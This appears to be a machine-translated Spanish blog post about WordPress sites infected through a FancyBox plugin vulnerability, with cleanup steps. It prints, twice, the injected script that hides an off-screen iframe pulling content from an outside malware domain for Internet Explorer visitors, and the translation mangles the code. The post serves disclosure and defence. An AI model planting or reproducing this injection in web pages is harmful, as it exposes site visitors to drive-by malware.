A principios de esta semana una serie de sitios web y blogs WordPressHan recibido advertencias infectados con malware a través de Google Webmasters.
El problema al que Google Webmasters a que se refiere es la presencia de un código / guión iframe malware los sitios web de origen.
<Script> si (navigator.userAgent.match (/ MSIE / i)) document.write {( '<div style = "position: absolute; izquierda: -2000px; anchura: 2000px"> <iframe src = "http: / /203koko.eu/hjnfh/ipframe2.php "width =" 20 "height =" 30 "> </ iframe> </ div> '); } </ Script>
Parece que es una vulnerabilidad a pluginacervoFancyBox para WordPress que hasta ayer (05.02.2015) no había sido actualizado desde hace mucho tiempo.
La solución de este problema y desinfección de sitios virus con este malware, es relativamente simple.
1. Desactivar sitio FancyBox plugn.
2. Eliminar todos los archivos del complemento FancyBox del servidor (a través de FTP)
3. Instale la nueva versión del plugin (FancyBox 3.0.4)
FancyBox para WordPress 3.0.4
- Renombrado el ajuste de Afectados por el problema de seguridad mencionado en 3.0.3. Esto no deberia detener el código malicioso que aparezcan en los sitios donde se encuentran el plugin se actualiza Sin eliminar el código malicioso.
FancyBox para WordPress 3.0.3
-Se ha corregido un problema de seguridad.
Malware Info:
TIPO: Iframe redirección
OBJETIVO: FancyBox WordPress
DOMINIO MALWARE: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE código crudo: <iframe src = "http://203koko.eu/hjnfh/ipframe2.php" width = altura "20" = "30"> </ iframe>
MALWARE GUIÓN: <script> si (/ / i) navigator.userAgent.match (MSIE) {document.write ('<div style = "position: absolute; left: -2000px; anchura: 2000px">
Eliminar el malware de tu sitio de WordPress.
